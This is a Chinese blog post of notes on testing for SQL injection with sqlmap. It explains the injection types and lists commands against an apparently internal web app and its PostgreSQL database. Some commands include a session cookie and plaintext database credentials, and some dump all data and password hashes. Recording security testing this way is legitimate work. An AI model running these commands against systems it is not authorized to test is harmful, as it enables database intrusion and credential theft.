SQLMap的測試總結

上一篇 / 下一篇  2021-03-26 16:46:02 / 個人分類:sql注入測試

1、sql注入的解釋與測試模式:
基于布爾的盲注,即可以根據返回頁面判斷條件真假的注入;
基于時間的盲注,即不能根據頁面返回內容判斷任何信息,用條件語句查看時間延遲語句是否執行(即頁面返回時間是否增加)來判斷;
基于報錯注入,即頁面會返回錯誤信息,或者把注入的語句的結果直接返回在頁面中;
聯合查詢注入,可以使用union的情況下的注入;
堆查詢注入,可以同時執行多條語句的執行時的注入。
2、本質:
通過url地址,訪問系統來實現一些具體操作,并根據一些特殊條件,如sql語句、sql語句的一些特殊字符、sql的一些特殊格式、某些邊界值等,來替換uri中的參數,來實現sql注入的測試。
3、
url樣例:
(1)get類型樣例
(2)post類型樣例
抓包后將http請求保存為文件,通過讀取文件的形式進行測試
ra.txt(3.1 KB)
4、環境配置
python2環境下運行
5、命令
(1)盲注命令:
5.1對于get請求
python sqlmap.py -u "http://192.168.10.199:2115/unira/superadmin/admin/superadmin/edit?id=88cd66c0907b4381b7d953774f7f1d0d" --dbms PostgreSql --level=3 --risk=2 --cookie PHPSESSID=e43616a2510ea0f85a98b1243490d933 --keep-alive -o -beep
-u 目標地址
--dbms 指定數據庫類型
--level 指定測試級別,默認為1初級,執行測試的等級(1-5,默認為1)
--risk指定測試危險系數,執行測試的風險(0-3,默認為1)
--cookie 指定登陸時候產生cookie,跳過登陸校驗
--keep-alive 保持長連接
-o 優化測試過程
-beep 有sql注入即提示
5.2對于post請求
python sqlmap.py -r "C:\Users\liang\Desktop\ra.txt" --dbms PostgreSql --level=3 --risk=3 --keep-alive -o --beep
加載完畢ra.txt后,按“回車”鍵
(2)連接數據庫命令
直連數據庫:
首先需要安裝與postgresql數據庫相關的psycopy2插件
a、執行python sqlmap.py -d"postgresql://syan:Syan1234!@192.168.10.199:5432/unira" 即可查看當前dbms類型
b、python sqlmap.py -d"postgresql://syan:Syan1234!@192.168.10.199:5432/unira" -a查看所有數據
c、python sqlmap.py -d"postgresql://syan:Syan1234!@192.168.10.199:5432/unira" -f 查看數據庫指紋
d、python sqlmap.py -d"postgresql://syan:Syan1234!@192.168.10.199:5432/unira" -b 查看banner,編譯信息
e、python sqlmap.py -d"postgresql://syan:Syan1234!@192.168.10.199:5432/unira" --current-user查看當前數據庫user
f、python sqlmap.py -d"postgresql://syan:Syan1234!@192.168.10.199:5432/unira" --passwords查看數據庫passswords的hash值
g、python sqlmap.py -d"postgresql://syan:Syan1234!@192.168.10.199:5432/unira" --tables查看unira數據庫中的所有的表
h、python sqlmap.py -d"postgresql://syan:Syan1234!@192.168.10.199:5432/unira" --columns查看unira數據庫中的所有表的字段
i、python sqlmap.py -d"postgresql://syan:Syan1234!@192.168.10.199:5432/unira" --schema public 查看schema為public的所有表信息

TAG:

 

評分:0

我來說兩句

顯示全部

:loveliness: :handshake :victory: :funk: :time: :kiss: :call: :hug: :lol :'( :Q :L ;P :$ :P :o :@ :D :( :)

Open Toolbar
农村里的风流韵事